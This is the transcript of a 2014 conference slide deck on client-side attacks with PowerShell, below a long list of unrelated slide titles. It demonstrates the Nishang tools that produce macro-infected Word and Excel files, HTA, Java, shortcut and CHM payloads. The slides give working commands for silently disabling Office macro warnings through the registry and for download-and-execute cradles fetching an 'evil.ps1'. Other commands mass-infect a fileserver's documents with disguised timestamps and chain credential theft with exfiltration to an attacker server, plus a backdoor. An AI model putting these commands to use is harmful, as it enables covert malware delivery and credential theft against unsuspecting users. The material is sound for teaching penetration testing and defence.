Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
IndexBug
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 

Recently uploaded (20)

Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 

Client side attacks using PowerShell

  • 1. Lethal Client Side Attacks using PowerShell Nikhil Mittal
  • 2. Get-Host • SamratAshok • Twitter - @nikhil_mitt • Blog – http://labofapenetrationtester.com • Creator of Kautilya and Nishang • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous Talks – Clubhack’10, Hackfest’11, Clubhack’11, Black hat Abu Dhabi’11, Black Hat Europe’12, Troopers’12, PHDays’12, Black Hat USA’12, RSA China’12, EuSecWest’12, Troopers’13, Defcon’13, Troopers’14 DeepSec 2014 2
  • 3. Get-Content • Client Side Attacks • What is PowerShell • Why PowerShell? • Using PowerShell for client side attacks – Out-Word – Out-Excel – Out-Shortcut – Out-CHM – Out-Java – Out-HTA • Defense against such attacks. • Conclusion DeepSec 2014 3
  • 4. “Of war, there is open war, concealed war and silent war…..one can prevail only by maintaining secrecy when striking again and again” – Chanakya DeepSec 2014 4
  • 5. Client Side Attacks • Server side is being locked down like never before. There are protection measures, patching and extensive monitoring on the server side. Though, there is no dearth of vulnerabilities on the server side, exploiting those is getting more and more difficult. • I noticed unprecedented pace by clients while applying patches for HeartBleed, ShellShock etc. • There are higher chances to get noticed if we are using Server side attacks. DeepSec 2014 5
  • 6. Client Side Attacks • The client side is still a lesser priority when it comes to patches, monitoring and other security measures. • The “perimeter-ized” network is still the norm. • I still found older versions of Adobe Reader on client machines during penetration tests. • There are less chances of getting caught if the attack begins from a user’s machine. DeepSec 2014 6
  • 7. Client Side Attacks • Another thing which helps in the client side attacks is, when users use same credentials, data, servers, emails on daily basis, they tend to become casual about those. They cease to attach much importance to those things as they seem normal to them. DeepSec 2014 7
  • 8. Client Side Attacks • It is still better not to use exploitation of memory corruption bugs in client side attacks. Generally, those are more prone to get caught. • It would be really nice if we are able to launch client side attacks with things built-in or native to the Operating System which we have to target. • This is where PowerShell comes in the picture. DeepSec 2014 8
  • 9. What is PowerShell • “Windows PowerShell® is a task-based command-line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en-us/ library/bb978526.aspx DeepSec 2014 9
  • 10. Why PowerShell • A shell and scripting language already present on the most general targets in a penetration test. • A powerful method to “reside” in the systems and network. • Provides easy access to .Net classes, WMI, Windows API, WinRM, Registry etc. • Less dependence on msf and *nix scripting scripts converted to executables. DeepSec 2014 10
  • 11. Using PowerShell for Client Side Attacks • Using PowerShell in a client side attack results in impressive post exploitation. • We could not only have access to everything on the system very easily using PowerShell but also to other machines on the domain network. • That makes it an ideal script for such attacks. DeepSec 2014 11
  • 12. Using PowerShell for Client Side Attacks • Lets begin with Microsoft Office Documents. DeepSec 2014 12
  • 13. Out-Word.ps1 • Use Out-Word to generate “armed” or “infected” MS Word documents. • The generated Word document has an auto executable macro which runs the provided PowerShell payload. • The PowerShell payload executes silently without affecting the normal usage of the Word document. DeepSec 2014 13
  • 14. Out-Word.ps1 • Below command generates a Word file, named Salary_Details.doc Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process" • Though you would be unable to see the output in above example, lets see what happened. DeepSec 2014 14
  • 15. Out-Word.ps1 • Notice that we are not getting any warning regarding Macros when we open the Doc. Why? Because of these in the code New-ItemProperty -Path "HKCU:SoftwareMicrosoftOffice$($Wo rd.Version)wordSecurity" -Name AccessVBOM -Value 1 -Force | Out-Null New-ItemProperty -Path "HKCU:SoftwareMicrosoftOffice$($Wo rd.Version)wordSecurity" -Name VBAWarnings -Value 1 -Force | Out-Null DeepSec 2014 15
  • 16. Out-Word.ps1 • We have effectively disabled Word Macro Security on the computer where the script is executed. – So, if we execute the script on our system and send the files to the target, he will see the warning. – But, if the script is executed on the target computer, no such warning would be displayed. DeepSec 2014 16
  • 17. Out-Word.ps1 • The default payload with the script is to download and execute, in memory, a PowerShell script. Thus, the easiest way to use it is: Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 DeepSec 2014 17
  • 18. Out-Word.ps1 • The URL is passed to below code: powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New- Object Net.WebClient).DownloadString('$ PayloadURL'));$Arguments" DeepSec 2014 18
  • 19. Out-Word.ps1 • Note that we could also pass arguments to the script getting downloaded. For example: Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 -Arguments Evil • This is useful when the script loads a function in memory or a PowerShell Module is used. • The Macro code uses WMI to create a process out of the payload we pass onto it. DeepSec 2014 19
  • 20. Out-Word.ps1 • Now, what if we get access to a fileserver and want to infect all files or files in a particular directory? Use below command: Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:docfiles • In above, in the C:docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name and same LastWriteTime. DeepSec 2014 20
  • 21. Out-Word.ps1 • Use the –Recurse option to recursively generate .doc files in the docfiles directory Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 -WordFileDir C:docfiles - Recurse • Use –RemoveDocx, to delete the original docx files after doc files have been generated. DeepSec 2014 21
  • 22. Out-Word.ps1 • LastWriteTime of the docx file is copied to the newly generate infected file to make it look auhtentic. • Also, if the file extensions for known file types are hidden. “.docx” is added to the generated doc files. DeepSec 2014 22
  • 23. Out-Excel.ps1 • Out-Excel works exactly same as Out-Word with same features, payloads etc. • I prefer Out-Excel, as in my experience, users are generally ok with Macros in Excel than in Word. DeepSec 2014 23
  • 24. Out-HTA.ps1 • Use this to generate HTML Application and accompanying VBScript. These could be deployed on a web server. • When a user opens the HTA, the VBScript is executed which, in turn, executes the specified PowerShell payload. DeepSec 2014 24
  • 25. Out-HTA.ps1 • The default name of the HTA is WindDef_WebInstall.hta and for VBS it is launchps.vbs • Both the files should be hosted in the same directory of a web server or the HTA should be modified to point to correct path of the VB Script. DeepSec 2014 25
  • 26. Out-HTA.ps1 • Use below command to generate the files: Out-HTA -Payload "powershell.exe - ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem" • As in other client side attacks we discussed, you can also use a PowerShell Module Out-HTA -PayloadURL http://192.168.254.1/powerpreter.p sm1 -Arguments Check-VM DeepSec 2014 26
  • 27. Out-Java.ps1 • Out-Java could be used to execute PowerShell commands and scripts. • It outputs four files,a .java file which contains the Java source, a .class file which is the compiled Java class, a manifest.txt file and a JAR executable. • It needs JDK on the attacker’s machine. DeepSec 2014 27
  • 28. Out-Java.ps1 • Use below command: Out-Java -Payload "Get-Process" - JDKPath "C:Program FilesJavajdk1.7.0_25" • To download and execute a script in memory, use this: Out-Java -PayloadURL http://192.168.254.1/Get- Information.ps1 -JDKPath "C:Program FilesJavajdk1.7.0_25" DeepSec 2014 28
  • 29. Out-Java.ps1 • You could also use PowerShell Modules. Out-Java -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments Check-VM - JDKPath "C:Program FilesJavajdk1.7.0_25" DeepSec 2014 29
  • 30. Out-Shortcut.ps1 • Out-Shortcut creates a shortcut (.lnk) which could be used for executing PowerShell commands and scripts. • When the target users clicks on the shortcut, which is set to PowerShell, the predefined command or script is executed. • The target user will see a window flash/open. DeepSec 2014 30
  • 31. Out-Shortcut.ps1 • Use below command to execute a PowerShell command: Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass - noprofile -noexit -c Get-ChildItem" • Use below command to download and execute, in memory, a PowerShell script: Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1 DeepSec 2014 31
  • 32. Out-Shortcut.ps1 • If Out-Shortcut is executed on the target, we can set a Hotkey for the shortcut so that ot executed everytime the key is pressed: Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments Check-VM - HotKey 'F3' -Icon 'notepad.exe' DeepSec 2014 32
  • 33. Out-CHM.ps1 • We could also use Compiled HTML Help files (CHM) to execute PowerShell commands and scripts. • When the target opens the CHM file, the predefined command or script is executed. • The target user will see a window flash/open. DeepSec 2014 33
  • 34. Out-CHM.ps1 • Use below command to execute a PowerShell command Out-CHM -Payload "Get-Process" - HHCPath "C:Program Files (x86)HTML Help Workshop" DeepSec 2014 34
  • 35. Out-CHM.ps1 • Use below command to execute encoded command/script. Out-CHM -Payload "- EncodedCommand <>" -HHCPath "C:Program Files (x86)HTML Help Workshop" Use Invoke-Encode from Nishang for encoding. DeepSec 2014 35
  • 36. Out-CHM.ps1 • Use below command to download and execute a script in memroy. Out-CHM -PayloadURL http://192.168.254.1/Get- Information.ps1 -HHCPath "C:Program Files (x86)HTML Help Workshop" DeepSec 2014 36
  • 37. More complex attacks • Any of the discussed, could be used for more effective attacks like: Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments "Credentials | Do-Exfiltration –ExfilOption Webserver -URL http://192.168.254.183/test/data .php" DeepSec 2014 37
  • 38. More complex attacks • We could do some really cool stuff, like running a backdoor with a new communications channel Out-Shortcut -PayloadURL “http://192.168.254.1/Gupt- Backdoor.ps1” –Arguments "Gupt-backdoor -MagicString op3n – Verbose” DeepSec 2014 38
  • 39. More complex attacks • We could do Egress Testing Out-Shortcut -PayloadURL “http://192.168.254.1/FireBuster .ps1” –Arguments “FireBuster 192.168.254.1 4443-4447” DeepSec 2014 39
  • 40. More complex attacks • Other machines on the network could be port scanned. Out-Shortcut -PayloadURL “http://192.168.254.1/Port- Scan.ps1” –Arguments “Port-Scan - StartAddress 192.168.254.1 - EndAddress 192.168.254.254 - ResolveHost -ScanPort” • We could do a port scan for all the hosts in the current network segment, it is unlikely that we know the network range as in above example. DeepSec 2014 40
  • 41. More complex attacks • We could also run other client side attacks. For example, lets infect every word file in the C:client directory Out-Shortcut -PayloadURL “http://192.168.254.1/Out- Word.ps1” –Arguments “Out-Word - PayloadURL http://192.168.254.1/Speak.ps1 - WordFileDir C:client” DeepSec 2014 41
  • 42. More complex attacks • We could force browse or download and execute exploits to escalate privileges. • On Windows 8, we could dump web credentials stored in Windows Vault in plain text (admin privs required). • We could check if the current user has privileges to access other machines on the network. • And much more. DeepSec 2014 42
  • 43. Defense • Use awareness is the best defense against such attacks. • Removal of VBA from MS Office would help with the office document attacks. But it could break so many things. • Active monitoring of the user machines may also help in detecting such attacks. DeepSec 2014 43
  • 44. Conclusion • Usage of PowerShell makes these attacks much more lethal and powerful. • We need to not stick to getting a shell, we could go much further using only the client side attacks. • The attacks would continue as long as users continue opening attachments and click on links, that means, for ever :) DeepSec 2014 44
  • 45. Recommended PowerShell Tools • Nishang • PowerSploit • Posh-SecMod • Veil-PowerView • PowerUp • PoshSec • Kansa • Voyeur • Powercat DeepSec 2014 45
  • 46. Credits/Reference • Thanks to DeepSec for accepting me. • Macro code for MS Office documents has been taken from Matt’s work: https://github.com/enigma0x3 • The idea for Out-CHM is taken from this tweet and attached file: https://twitter.com/ithurricanept/status/5349 93743196090368 DeepSec 2014 46
  • 47. Thank You • Questions? • I am looking for contributors. • Nishang is available at https://github.com/samratashok/nishang • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 47

Editor's Notes

  1. Macro code from here http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/